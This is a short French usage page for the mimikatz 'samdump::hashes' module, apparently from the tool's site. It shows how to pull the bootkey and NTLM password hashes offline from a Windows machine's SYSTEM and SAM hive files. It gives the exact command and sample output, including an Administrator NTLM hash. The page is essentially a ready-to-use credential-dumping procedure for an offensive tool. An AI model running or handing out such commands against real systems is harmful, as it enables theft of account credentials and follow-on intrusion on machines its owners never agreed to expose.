mimikatz :: samdump

samdump

Dump des hashes offline et bootkey

Méthodes :

samdump :: hashes

Description : Dump des hashes offline et bootkey
Arguments : system sam
Remarque : Les bases SYSTEM et SAM courante de Windows sont vérouillées.
Exemple : samdump::hashes z:\windows\system32\config\system z:\windows\system32\config\sam

mimikatz # samdump::hashes z:\windows\system32\config\system z:\windows\system32\config\sam
Ordinateur : VM-W2K8R2-ENT-X
BootKey    : c4ed5743f54e4f1fdc6cca89723335ce

Rid  : 500
User : Administrateur
LM   :
NTLM : cc36cf7a8514893efccd332446158b1a

Rid  : 501
User : Invité
LM   :
NTLM :

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

*

Vous pouvez utiliser ces balises et attributs HTML : <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>